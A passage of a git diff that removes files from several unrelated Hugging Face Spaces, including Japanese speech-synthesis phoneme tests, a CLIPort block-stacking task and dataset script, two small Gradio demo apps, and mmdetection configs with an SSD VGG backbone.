- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # e
- "o^d-e+s=U/A:2+3+2/B:22-xx_xx/C:10_7+2/D:xx+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # s
- "d^e-s+U=sil/A:3+4+1/B:22-xx_xx/C:10_7+2/D:xx+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # U (無声母音)
- "e^s-U+sil=xx/A:3+4+1/B:22-xx_xx/C:10_7+2/D:xx+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # sil (無音)
- "s^U-sil+xx=xx/A:xx+xx+xx/B:10-7_2/C:xx_xx+xx/D:xx+xx_xx/E:4_1!0_xx-xx"
- + "/F:xx_xx#xx_xx@xx_xx|xx_xx/G:xx_xx%xx_xx_xx/H:1_4/I:xx-xx"
- + "@xx+xx&xx-xx|xx+xx/J:xx_xx/K:2+2-9",
- ]
- self.phonemes_hello_hiho = [
- Phoneme.from_label(label) for label in self.test_case_hello_hiho
- ]
-
-
-class TestPhoneme(TestBasePhonemes):
- def test_phoneme(self):
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in self.phonemes_hello_hiho]),
- "sil k o N n i ch i w a pau h i h o d e s U sil",
- )
-
- def test_is_pause(self):
- self.assertEqual(
- [phoneme.is_pause() for phoneme in self.phonemes_hello_hiho],
- [
- True, # sil
- False, # k
- False, # o
- False, # N
- False, # n
- False, # i
- False, # ch
- False, # i
- False, # w
- False, # a
- True, # pau
- False, # h
- False, # i
- False, # h
- False, # o
- False, # d
- False, # e
- False, # s
- False, # u
- True, # sil
- ],
- )
-
- def test_label(self) -> None:
- self.assertEqual(
- [phoneme.label for phoneme in self.phonemes_hello_hiho],
- self.test_case_hello_hiho,
- )
-
-
-class TestMora(TestBasePhonemes):
- def setUp(self) -> None:
- super().setUp()
- # contexts["a2"] == "1" ko
- self.mora_hello_1 = Mora(
- consonant=self.phonemes_hello_hiho[1], vowel=self.phonemes_hello_hiho[2]
- )
- # contexts["a2"] == "2" N
- self.mora_hello_2 = Mora(consonant=None, vowel=self.phonemes_hello_hiho[3])
- # contexts["a2"] == "3" ni
- self.mora_hello_3 = Mora(
- consonant=self.phonemes_hello_hiho[4], vowel=self.phonemes_hello_hiho[5]
- )
- # contexts["a2"] == "4" chi
- self.mora_hello_4 = Mora(
- consonant=self.phonemes_hello_hiho[6], vowel=self.phonemes_hello_hiho[7]
- )
- # contexts["a2"] == "5" wa
- self.mora_hello_5 = Mora(
- consonant=self.phonemes_hello_hiho[8], vowel=self.phonemes_hello_hiho[9]
- )
- # contexts["a2"] == "1" hi
- self.mora_hiho_1 = Mora(
- consonant=self.phonemes_hello_hiho[11], vowel=self.phonemes_hello_hiho[12]
- )
- # contexts["a2"] == "2" ho
- self.mora_hiho_2 = Mora(
- consonant=self.phonemes_hello_hiho[13], vowel=self.phonemes_hello_hiho[14]
- )
- # contexts["a2"] == "3" de
- self.mora_hiho_3 = Mora(
- consonant=self.phonemes_hello_hiho[15], vowel=self.phonemes_hello_hiho[16]
- )
- # contexts["a2"] == "1" sU
- self.mora_hiho_4 = Mora(
- consonant=self.phonemes_hello_hiho[17], vowel=self.phonemes_hello_hiho[18]
- )
-
- def assert_phonemes(self, mora: Mora, mora_str: str) -> None:
- self.assertEqual(
- "".join([phoneme.phoneme for phoneme in mora.phonemes]), mora_str
- )
-
- def assert_labels(self, mora: Mora, label_start: int, label_end: int) -> None:
- self.assertEqual(mora.labels, self.test_case_hello_hiho[label_start:label_end])
-
- def test_phonemes(self) -> None:
- self.assert_phonemes(self.mora_hello_1, "ko")
- self.assert_phonemes(self.mora_hello_2, "N")
- self.assert_phonemes(self.mora_hello_3, "ni")
- self.assert_phonemes(self.mora_hello_4, "chi")
- self.assert_phonemes(self.mora_hello_5, "wa")
- self.assert_phonemes(self.mora_hiho_1, "hi")
- self.assert_phonemes(self.mora_hiho_2, "ho")
- self.assert_phonemes(self.mora_hiho_3, "de")
- self.assert_phonemes(self.mora_hiho_4, "sU")
-
- def test_labels(self) -> None:
- self.assert_labels(self.mora_hello_1, 1, 3)
- self.assert_labels(self.mora_hello_2, 3, 4)
- self.assert_labels(self.mora_hello_3, 4, 6)
- self.assert_labels(self.mora_hello_4, 6, 8)
- self.assert_labels(self.mora_hello_5, 8, 10)
- self.assert_labels(self.mora_hiho_1, 11, 13)
- self.assert_labels(self.mora_hiho_2, 13, 15)
- self.assert_labels(self.mora_hiho_3, 15, 17)
- self.assert_labels(self.mora_hiho_4, 17, 19)
-
- def test_set_context(self):
- # 値を書き換えるので、他のテストに影響を出さないためにdeepcopyする
- mora_hello_1 = deepcopy(self.mora_hello_1)
- # phonemeにあたる"p3"を書き換える
- mora_hello_1.set_context("p3", "a")
- self.assert_phonemes(mora_hello_1, "aa")
-
-
-class TestAccentPhrase(TestBasePhonemes):
- def setUp(self) -> None:
- super().setUp()
- # TODO: ValueErrorを吐く作為的ではない自然な例の模索
- # 存在しないなら放置でよい
- self.accent_phrase_hello = AccentPhrase.from_phonemes(
- self.phonemes_hello_hiho[1:10]
- )
- self.accent_phrase_hiho = AccentPhrase.from_phonemes(
- self.phonemes_hello_hiho[11:19]
- )
-
- def test_accent(self):
- self.assertEqual(self.accent_phrase_hello.accent, 5)
- self.assertEqual(self.accent_phrase_hiho.accent, 1)
-
- def test_set_context(self):
- accent_phrase_hello = deepcopy(self.accent_phrase_hello)
- # phonemeにあたる"p3"を書き換える
- accent_phrase_hello.set_context("p3", "a")
- self.assertEqual(
- "".join([phoneme.phoneme for phoneme in accent_phrase_hello.phonemes]),
- "aaaaaaaaa",
- )
-
- def test_phonemes(self):
- self.assertEqual(
- " ".join(
- [phoneme.phoneme for phoneme in self.accent_phrase_hello.phonemes]
- ),
- "k o N n i ch i w a",
- )
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in self.accent_phrase_hiho.phonemes]),
- "h i h o d e s U",
- )
-
- def test_labels(self):
- self.assertEqual(
- self.accent_phrase_hello.labels, self.test_case_hello_hiho[1:10]
- )
- self.assertEqual(
- self.accent_phrase_hiho.labels, self.test_case_hello_hiho[11:19]
- )
-
- def test_merge(self):
- # 「こんにちはヒホです」
- # 読点を無くしたものと同等
- merged_accent_phrase = self.accent_phrase_hello.merge(self.accent_phrase_hiho)
- self.assertEqual(merged_accent_phrase.accent, 5)
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in merged_accent_phrase.phonemes]),
- "k o N n i ch i w a h i h o d e s U",
- )
- self.assertEqual(
- merged_accent_phrase.labels,
- self.test_case_hello_hiho[1:10] + self.test_case_hello_hiho[11:19],
- )
-
-
-class TestBreathGroup(TestBasePhonemes):
- def setUp(self) -> None:
- super().setUp()
- self.breath_group_hello = BreathGroup.from_phonemes(
- self.phonemes_hello_hiho[1:10]
- )
- self.breath_group_hiho = BreathGroup.from_phonemes(
- self.phonemes_hello_hiho[11:19]
- )
-
- def test_set_context(self):
- # 値を書き換えるので、他のテストに影響を出さないためにdeepcopyする
- breath_group_hello = deepcopy(self.breath_group_hello)
- # phonemeにあたる"p3"を書き換える
- breath_group_hello.set_context("p3", "a")
- self.assertEqual(
- "".join([phoneme.phoneme for phoneme in breath_group_hello.phonemes]),
- "aaaaaaaaa",
- )
-
- def test_phonemes(self):
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in self.breath_group_hello.phonemes]),
- "k o N n i ch i w a",
- )
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in self.breath_group_hiho.phonemes]),
- "h i h o d e s U",
- )
-
- def test_labels(self):
- self.assertEqual(
- self.breath_group_hello.labels, self.test_case_hello_hiho[1:10]
- )
- self.assertEqual(
- self.breath_group_hiho.labels, self.test_case_hello_hiho[11:19]
- )
-
-
-class TestUtterance(TestBasePhonemes):
- def setUp(self) -> None:
- super().setUp()
- self.utterance_hello_hiho = Utterance.from_phonemes(self.phonemes_hello_hiho)
-
- def test_phonemes(self):
- self.assertEqual(
- " ".join(
- [phoneme.phoneme for phoneme in self.utterance_hello_hiho.phonemes]
- ),
- "sil k o N n i ch i w a pau h i h o d e s U sil",
- )
- changed_utterance = Utterance.from_phonemes(self.utterance_hello_hiho.phonemes)
- self.assertEqual(len(changed_utterance.breath_groups), 2)
- accent_phrases = list(
- chain.from_iterable(
- breath_group.accent_phrases
- for breath_group in changed_utterance.breath_groups
- )
- )
- for prev, cent, post in zip(
- [None] + accent_phrases[:-1],
- accent_phrases,
- accent_phrases[1:] + [None],
- ):
- mora_num = len(cent.moras)
- accent = cent.accent
-
- if prev is not None:
- for phoneme in prev.phonemes:
- self.assertEqual(phoneme.contexts["g1"], str(mora_num))
- self.assertEqual(phoneme.contexts["g2"], str(accent))
-
- if post is not None:
- for phoneme in post.phonemes:
- self.assertEqual(phoneme.contexts["e1"], str(mora_num))
- self.assertEqual(phoneme.contexts["e2"], str(accent))
-
- for phoneme in cent.phonemes:
- self.assertEqual(
- phoneme.contexts["k2"],
- str(
- sum(
- [
- len(breath_group.accent_phrases)
- for breath_group in changed_utterance.breath_groups
- ]
- )
- ),
- )
-
- for prev, cent, post in zip(
- [None] + changed_utterance.breath_groups[:-1],
- changed_utterance.breath_groups,
- changed_utterance.breath_groups[1:] + [None],
- ):
- accent_phrase_num = len(cent.accent_phrases)
-
- if prev is not None:
- for phoneme in prev.phonemes:
- self.assertEqual(phoneme.contexts["j1"], str(accent_phrase_num))
-
- if post is not None:
- for phoneme in post.phonemes:
- self.assertEqual(phoneme.contexts["h1"], str(accent_phrase_num))
-
- for phoneme in cent.phonemes:
- self.assertEqual(phoneme.contexts["i1"], str(accent_phrase_num))
- self.assertEqual(
- phoneme.contexts["i5"],
- str(accent_phrases.index(cent.accent_phrases[0]) + 1),
- )
- self.assertEqual(
- phoneme.contexts["i6"],
- str(
- len(accent_phrases)
- - accent_phrases.index(cent.accent_phrases[0])
- ),
- )
-
- def test_labels(self):
- self.assertEqual(self.utterance_hello_hiho.labels, self.test_case_hello_hiho)
diff --git a/spaces/Gen-Sim/Gen-Sim/cliport/generated_tasks/stack_blocks_in_container.py b/spaces/Gen-Sim/Gen-Sim/cliport/generated_tasks/stack_blocks_in_container.py
deleted file mode 100644
index d7121c06c76a825c008373a64e180366249358bd..0000000000000000000000000000000000000000
--- a/spaces/Gen-Sim/Gen-Sim/cliport/generated_tasks/stack_blocks_in_container.py
+++ /dev/null
@@ -1,51 +0,0 @@
-import numpy as np
-import os
-import pybullet as p
-import random
-from cliport.tasks import primitives
-from cliport.tasks.grippers import Spatula
-from cliport.tasks.task import Task
-from cliport.utils import utils
-import numpy as np
-from cliport.tasks.task import Task
-from cliport.utils import utils
-
-class StackBlocksInContainer(Task):
- """Pick up five blocks of different colors (red, blue, green, yellow, and orange)
- and stack them in a container in a specific sequence.
- The bottom of the stack should start with a red block followed by a blue,
- green, yellow and finally an orange block at the top."""
-
- def __init__(self):
- super().__init__()
- self.max_steps = 15
- self.lang_template = "stack the blocks in the container in the following order: {order}"
- self.task_completed_desc = "done stacking blocks in container."
- self.order = ['red', 'blue', 'green', 'yellow', 'orange']
- self.colors = [utils.COLORS[color] for color in self.order]
-
- def reset(self, env):
- super().reset(env)
-
- # Add container.
- container_size = (0.15, 0.15, 0.15) # x, y, z dimensions for the container size
- container_pose = self.get_random_pose(env, container_size)
- container_urdf = 'container/container-template.urdf'
- replace = {'DIM': container_size, 'HALF': (container_size[0] / 2, container_size[1] / 2, container_size[2] / 2)}
- container_urdf = self.fill_template(container_urdf, replace)
- env.add_object(container_urdf, container_pose, 'fixed')
-
- # Add blocks.
- block_size = (0.04, 0.04, 0.04) # x, y, z dimensions for the block size
- block_urdf = 'block/block.urdf'
- blocks = []
- for color in self.colors:
- block_pose = self.get_random_pose(env, block_size)
- block_id = env.add_object(block_urdf, block_pose, color=color)
- blocks.append(block_id)
-
- # Goal: each block is stacked in the container in the specified order.
- for i in range(len(blocks)):
- self.add_goal(objs=[blocks[i]], matches=np.ones((1, 1)), targ_poses=[container_pose], replace=False,
- rotations=True, metric='pose', params=None, step_max_reward=1 / len(blocks),
- language_goal=self.lang_template.format(order=', '.join(self.order)))
\ No newline at end of file
diff --git a/spaces/Gen-Sim/Gen-Sim/scripts/regenerate_gpt_datasets.sh b/spaces/Gen-Sim/Gen-Sim/scripts/regenerate_gpt_datasets.sh
deleted file mode 100644
index e4da318dd92eca0af03771320d3831db08d340c7..0000000000000000000000000000000000000000
--- a/spaces/Gen-Sim/Gen-Sim/scripts/regenerate_gpt_datasets.sh
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/bin/bash
-
-DATA_DIR=$1
-TASK=$2
-DISP=False
-
-echo "Generating dataset... Folder: $DATA_DIR"
-
-# sh scripts/generate_gpt_datasets.sh data "align-rope assembling-kits-seq-seen-colors assembling-kits-seq-unseen-colors packing-shapes packing-boxes-pairs-seen-colors packing-boxes-pairs-unseen-colors packing-seen-google-objects-seq packing-unseen-google-objects-seq packing-seen-google-objects-group packing-unseen-google-objects-group put-block-in-bowl-seen-colors put-block-in-bowl-unseen-colors stack-block-pyramid-seq-seen-colors stack-block-pyramid-seq-unseen-colors separating-piles-seen-colors separating-piles-unseen-colors towers-of-hanoi-seq-seen-colors towers-of-hanoi-seq-unseen-colors
-# sh scripts/generate_gpt_datasets.sh data "assemble-single-car stack-color-coordinated-blocks color-structured-block-tower insert-blocks-into-fixture construct-corner-building colored-cylinder-in-square color-coordinated-block-tower build-house align-pair-colored-blocks-along-line insert-sphere-into-container build-wheel build-two-circles build-car build-bridge manipulating-two-ropes rainbow-stack mix-piles stack-blocks-in-container"
-# You can parallelize these depending on how much resources you have
-
-#############################
-## Language-Conditioned Tasks
-
-# LANG_TASKS='align-rope assembling-kits-seq-seen-colors'
-trap "kill 0" SIGINT
-
-LANG_TASKS=$2
-
-for task in $LANG_TASKS
- do
- python cliport/demos.py n=200 task=$task mode=train data_dir=$DATA_DIR disp=$DISP record.save_video=False +regenerate_data=True &
- python cliport/demos.py n=50 task=$task mode=val data_dir=$DATA_DIR disp=$DISP record.save_video=False +regenerate_data=True &
- python cliport/demos.py n=100 task=$task mode=test data_dir=$DATA_DIR disp=$DISP record.save_video=False +regenerate_data=True &
- done
-wait
-
-echo "Finished Language Tasks."
-
-
diff --git a/spaces/Gradio-Blocks/Michael_Scott_Bot_Gradio_Blocks/app.py b/spaces/Gradio-Blocks/Michael_Scott_Bot_Gradio_Blocks/app.py
deleted file mode 100644
index f766020c8dad16ae0052ca17c9b273597324c389..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/Michael_Scott_Bot_Gradio_Blocks/app.py
+++ /dev/null
@@ -1,65 +0,0 @@
-from transformers import AutoTokenizer, AutoModelForCausalLM
-import torch
-import gradio as gr
-
-tokenizer = AutoTokenizer.from_pretrained("natdon/DialoGPT_Michael_Scott")
-model = AutoModelForCausalLM.from_pretrained("natdon/DialoGPT_Michael_Scott")
-
-chat_history_ids = None
-step = 0
-
-
-def predict(input, chat_history_ids=chat_history_ids, step=step):
- # encode the new user input, add the eos_token and return a tensor in Pytorch
- new_user_input_ids = tokenizer.encode(
- input + tokenizer.eos_token, return_tensors='pt')
-
- # append the new user input tokens to the chat history
- bot_input_ids = torch.cat(
- [chat_history_ids, new_user_input_ids], dim=-1) if step > 0 else new_user_input_ids
-
- # generated a response while limiting the total chat history to 1000 tokens,
- chat_history_ids = model.generate(
- bot_input_ids, max_length=1000,
- pad_token_id=tokenizer.eos_token_id,
- no_repeat_ngram_size=3,
- do_sample=True,
- top_k=100,
- top_p=0.7,
- temperature=0.8
- )
- step = step + 1
- output = tokenizer.decode(
- chat_history_ids[:, bot_input_ids.shape[-1]:][0], skip_special_tokens=True)
- return output
-
-
-demo = gr.Blocks()
-
-with demo:
- gr.Markdown(
- """
-
-
-
- ## Speak with Michael by typing in the input box below.
-
- """
- )
-
- with gr.Row():
- with gr.Column():
- inp = gr.Textbox(
- label="Enter text to converse with Michael here:",
- lines=1,
- max_lines=1,
- value="Wow this is hard",
- placeholder="What do you think of Toby?",
- )
- btn = gr.Button("Submit")
- out = gr.Textbox(lines=3)
- # btn = gr.Button("Submit")
- inp.submit(fn=predict, inputs=inp, outputs=out)
- btn.click(fn=predict, inputs=inp, outputs=out)
-
-demo.launch()
diff --git a/spaces/Gradio-Blocks/stylish_ape/app.py b/spaces/Gradio-Blocks/stylish_ape/app.py
deleted file mode 100644
index e7be672b25bbfaff094fa462e1e23eba76c25087..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/stylish_ape/app.py
+++ /dev/null
@@ -1,52 +0,0 @@
-# %%
-import gradio as gr
-
-example_generated_ape_super = "examples/generated_ape_super_resolution.jpg"
-example_generated_ape = "examples/generated_ape.png"
-example_stylish_ape = "examples/stylish_ape.png"
-example_style_starry_night = "examples/starry_night.jpeg"
-examples = [
- [example_generated_ape, example_style_starry_night, False],
- ["examples/another_generated_ape.png", "examples/The Scream (1893) by Edvard Munch.jpg", False],
- ["examples/ape02.png", "examples/Self-Portrait Without a Beard (1889) by Vincent van Gogh.jpg", True],
- ["examples/ape03.png", "examples/Oberon, Titania, and Puck with Fairies Dancing (1786) by William Blake.jpg", True],
-]
-
-ape_gen = gr.Interface.load("spaces/ykilcher/apes")
-super_resolution = gr.Interface.load("spaces/akhaliq/SwinIR")
-style_transfer = gr.Interface.load("spaces/aravinds1811/neural-style-transfer")
-
-def generate_ape(num_images=1, interpolate=False):
- return ape_gen(num_images, interpolate)
-
-def perform_style_transfer(content_image, style_image, is_super_resolution=False):
- stylish_ape = style_transfer(content_image, style_image)
- if is_super_resolution:
- stylish_ape = super_resolution(stylish_ape)
- return stylish_ape
-
-# %%
-with gr.Blocks() as demo:
- button_generate_ape = gr.Button("Generate Ape")
-
- generated_ape = gr.Image(example_generated_ape, label="Generated Ape", type="filepath")
- style_image_input = gr.Image(example_style_starry_night, label="Stylish Image", type="filepath")
- style_in_super_resolution = gr.Checkbox(True, label="Super resolution!")
- stylish_ape = gr.Image(example_stylish_ape, label="Stylish Ape")
-
- gr.Interface(
- fn=perform_style_transfer,
- inputs=[generated_ape, style_image_input, style_in_super_resolution],
- outputs=stylish_ape,
- examples=examples,
- allow_flagging="never",
- )
- with gr.Row():
- gr.Markdown("Apes by ykilcher, style transfer by Neural Style Transfer, and super resolution by SwinIR.")
- with gr.Row():
- gr.Markdown("")
-
- button_generate_ape.click(generate_ape, inputs=[], outputs=generated_ape)
-
-demo.launch(enable_queue=False)
-# %%
\ No newline at end of file
diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py
deleted file mode 100644
index 6ed5bcbb090b29ee57444d35b2eab5f23b58c2ee..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py
+++ /dev/null
@@ -1,131 +0,0 @@
-_base_ = [
- '../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
-]
-# model settings
-model = dict(
- type='GridRCNN',
- pretrained='torchvision://resnet50',
- backbone=dict(
- type='ResNet',
- depth=50,
- num_stages=4,
- out_indices=(0, 1, 2, 3),
- frozen_stages=1,
- norm_cfg=dict(type='BN', requires_grad=True),
- norm_eval=True,
- style='pytorch'),
- neck=dict(
- type='FPN',
- in_channels=[256, 512, 1024, 2048],
- out_channels=256,
- num_outs=5),
- rpn_head=dict(
- type='RPNHead',
- in_channels=256,
- feat_channels=256,
- anchor_generator=dict(
- type='AnchorGenerator',
- scales=[8],
- ratios=[0.5, 1.0, 2.0],
- strides=[4, 8, 16, 32, 64]),
- bbox_coder=dict(
- type='DeltaXYWHBBoxCoder',
- target_means=[.0, .0, .0, .0],
- target_stds=[1.0, 1.0, 1.0, 1.0]),
- loss_cls=dict(
- type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
- loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
- roi_head=dict(
- type='GridRoIHead',
- bbox_roi_extractor=dict(
- type='SingleRoIExtractor',
- roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
- out_channels=256,
- featmap_strides=[4, 8, 16, 32]),
- bbox_head=dict(
- type='Shared2FCBBoxHead',
- with_reg=False,
- in_channels=256,
- fc_out_channels=1024,
- roi_feat_size=7,
- num_classes=80,
- bbox_coder=dict(
- type='DeltaXYWHBBoxCoder',
- target_means=[0., 0., 0., 0.],
- target_stds=[0.1, 0.1, 0.2, 0.2]),
- reg_class_agnostic=False),
- grid_roi_extractor=dict(
- type='SingleRoIExtractor',
- roi_layer=dict(type='RoIAlign', output_size=14, sampling_ratio=0),
- out_channels=256,
- featmap_strides=[4, 8, 16, 32]),
- grid_head=dict(
- type='GridHead',
- grid_points=9,
- num_convs=8,
- in_channels=256,
- point_feat_channels=64,
- norm_cfg=dict(type='GN', num_groups=36),
- loss_grid=dict(
- type='CrossEntropyLoss', use_sigmoid=True, loss_weight=15))),
- # model training and testing settings
- train_cfg=dict(
- rpn=dict(
- assigner=dict(
- type='MaxIoUAssigner',
- pos_iou_thr=0.7,
- neg_iou_thr=0.3,
- min_pos_iou=0.3,
- ignore_iof_thr=-1),
- sampler=dict(
- type='RandomSampler',
- num=256,
- pos_fraction=0.5,
- neg_pos_ub=-1,
- add_gt_as_proposals=False),
- allowed_border=0,
- pos_weight=-1,
- debug=False),
- rpn_proposal=dict(
- nms_pre=2000,
- max_per_img=2000,
- nms=dict(type='nms', iou_threshold=0.7),
- min_bbox_size=0),
- rcnn=dict(
- assigner=dict(
- type='MaxIoUAssigner',
- pos_iou_thr=0.5,
- neg_iou_thr=0.5,
- min_pos_iou=0.5,
- ignore_iof_thr=-1),
- sampler=dict(
- type='RandomSampler',
- num=512,
- pos_fraction=0.25,
- neg_pos_ub=-1,
- add_gt_as_proposals=True),
- pos_radius=1,
- pos_weight=-1,
- max_num_grid=192,
- debug=False)),
- test_cfg=dict(
- rpn=dict(
- nms_pre=1000,
- max_per_img=1000,
- nms=dict(type='nms', iou_threshold=0.7),
- min_bbox_size=0),
- rcnn=dict(
- score_thr=0.03,
- nms=dict(type='nms', iou_threshold=0.3),
- max_per_img=100)))
-# optimizer
-optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
-optimizer_config = dict(grad_clip=None)
-# learning policy
-lr_config = dict(
- policy='step',
- warmup='linear',
- warmup_iters=3665,
- warmup_ratio=1.0 / 80,
- step=[17, 23])
-runner = dict(type='EpochBasedRunner', max_epochs=25)
diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/lvis/mask_rcnn_r50_fpn_sample1e-3_mstrain_1x_lvis_v1.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/lvis/mask_rcnn_r50_fpn_sample1e-3_mstrain_1x_lvis_v1.py
deleted file mode 100644
index 92ddb526d7ea7a011e10aa82cbd1bd62773b35d6..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/lvis/mask_rcnn_r50_fpn_sample1e-3_mstrain_1x_lvis_v1.py
+++ /dev/null
@@ -1,31 +0,0 @@
-_base_ = [
- '../_base_/models/mask_rcnn_r50_fpn.py',
- '../_base_/datasets/lvis_v1_instance.py',
- '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
-]
-model = dict(
- roi_head=dict(
- bbox_head=dict(num_classes=1203), mask_head=dict(num_classes=1203)),
- test_cfg=dict(
- rcnn=dict(
- score_thr=0.0001,
- # LVIS allows up to 300
- max_per_img=300)))
-img_norm_cfg = dict(
- mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
-train_pipeline = [
- dict(type='LoadImageFromFile'),
- dict(type='LoadAnnotations', with_bbox=True, with_mask=True),
- dict(
- type='Resize',
- img_scale=[(1333, 640), (1333, 672), (1333, 704), (1333, 736),
- (1333, 768), (1333, 800)],
- multiscale_mode='value',
- keep_ratio=True),
- dict(type='RandomFlip', flip_ratio=0.5),
- dict(type='Normalize', **img_norm_cfg),
- dict(type='Pad', size_divisor=32),
- dict(type='DefaultFormatBundle'),
- dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']),
-]
-data = dict(train=dict(dataset=dict(pipeline=train_pipeline)))
diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/mmdet/models/backbones/ssd_vgg.py b/spaces/Gradio-Blocks/uniformer_image_detection/mmdet/models/backbones/ssd_vgg.py
deleted file mode 100644
index cbc4fbb2301afc002f47abb9ed133a500d6cf23f..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/uniformer_image_detection/mmdet/models/backbones/ssd_vgg.py
+++ /dev/null
@@ -1,169 +0,0 @@
-import torch
-import torch.nn as nn
-import torch.nn.functional as F
-from mmcv.cnn import VGG, constant_init, kaiming_init, normal_init, xavier_init
-from mmcv.runner import load_checkpoint
-
-from mmdet.utils import get_root_logger
-from ..builder import BACKBONES
-
-
-@BACKBONES.register_module()
-class SSDVGG(VGG):
- """VGG Backbone network for single-shot-detection.
-
- Args:
- input_size (int): width and height of input, from {300, 512}.
- depth (int): Depth of vgg, from {11, 13, 16, 19}.
- out_indices (Sequence[int]): Output from which stages.
-
- Example:
- >>> self = SSDVGG(input_size=300, depth=11)
- >>> self.eval()
- >>> inputs = torch.rand(1, 3, 300, 300)
- >>> level_outputs = self.forward(inputs)
- >>> for level_out in level_outputs:
- ... print(tuple(level_out.shape))
- (1, 1024, 19, 19)
- (1, 512, 10, 10)
- (1, 256, 5, 5)
- (1, 256, 3, 3)
- (1, 256, 1, 1)
- """
- extra_setting = {
- 300: (256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256),
- 512: (256, 'S', 512, 128, 'S', 256, 128, 'S', 256, 128, 'S', 256, 128),
- }
-
- def __init__(self,
- input_size,
- depth,
- with_last_pool=False,
- ceil_mode=True,
- out_indices=(3, 4),
- out_feature_indices=(22, 34),
- l2_norm_scale=20.):
- # TODO: in_channels for mmcv.VGG
- super(SSDVGG, self).__init__(
- depth,
- with_last_pool=with_last_pool,
- ceil_mode=ceil_mode,
- out_indices=out_indices)
- assert input_size in (300, 512)
- self.input_size = input_size
-
- self.features.add_module(
- str(len(self.features)),
- nn.MaxPool2d(kernel_size=3, stride=1, padding=1))
- self.features.add_module(
- str(len(self.features)),
- nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6))
- self.features.add_module(
- str(len(self.features)), nn.ReLU(inplace=True))
- self.features.add_module(
- str(len(self.features)), nn.Conv2d(1024, 1024, kernel_size=1))
- self.features.add_module(
- str(len(self.features)), nn.ReLU(inplace=True))
- self.out_feature_indices = out_feature_indices
-
- self.inplanes = 1024
- self.extra = self._make_extra_layers(self.extra_setting[input_size])
- self.l2_norm = L2Norm(
- self.features[out_feature_indices[0] - 1].out_channels,
- l2_norm_scale)
-
- def init_weights(self, pretrained=None):
- """Initialize the weights in backbone.
-
- Args:
- pretrained (str, optional): Path to pre-trained weights.
- Defaults to None.
- """
- if isinstance(pretrained, str):
- logger = get_root_logger()
- load_checkpoint(self, pretrained, strict=False, logger=logger)
- elif pretrained is None:
- for m in self.features.modules():
- if isinstance(m, nn.Conv2d):
- kaiming_init(m)
- elif isinstance(m, nn.BatchNorm2d):
- constant_init(m, 1)
- elif isinstance(m, nn.Linear):
- normal_init(m, std=0.01)
- else:
- raise TypeError('pretrained must be a str or None')
-
- for m in self.extra.modules():
- if isinstance(m, nn.Conv2d):
- xavier_init(m, distribution='uniform')
-
- constant_init(self.l2_norm, self.l2_norm.scale)
-
- def forward(self, x):
- """Forward function."""
- outs = []
- for i, layer in enumerate(self.features):
- x = layer(x)
- if i in self.out_feature_indices:
- outs.append(x)
- for i, layer in enumerate(self.extra):
- x = F.relu(layer(x), inplace=True)
- if i % 2 == 1:
- outs.append(x)
- outs[0] = self.l2_norm(outs[0])
- if len(outs) == 1:
- return outs[0]
- else:
- return tuple(outs)
-
- def _make_extra_layers(self, outplanes):
- layers = []
- kernel_sizes = (1, 3)
- num_layers = 0
- outplane = None
- for i in range(len(outplanes)):
- if self.inplanes == 'S':
- self.inplanes = outplane
- continue
- k = kernel_sizes[num_layers % 2]
- if outplanes[i] == 'S':
- outplane = outplanes[i + 1]
- conv = nn.Conv2d(
- self.inplanes, outplane, k, stride=2, padding=1)
- else:
- outplane = outplanes[i]
- conv = nn.Conv2d(
- self.inplanes, outplane, k, stride=1, padding=0)
- layers.append(conv)
- self.inplanes = outplanes[i]
- num_layers += 1
- if self.input_size == 512:
- layers.append(nn.Conv2d(self.inplanes, 256, 4, padding=1))
-
- return nn.Sequential(*layers)
-
-
-class L2Norm(nn.Module):
-
- def __init__(self, n_dims, scale=20., eps=1e-10):
- """L2 normalization layer.
-
- Args:
- n_dims (int): Number of dimensions to be normalized
- scale (float, optional): Defaults to 20..
- eps (float, optional): Used to avoid division by zero.
- Defaults to 1e-10.
- """
- super(L2Norm, self).__init__()
- self.n_dims = n_dims
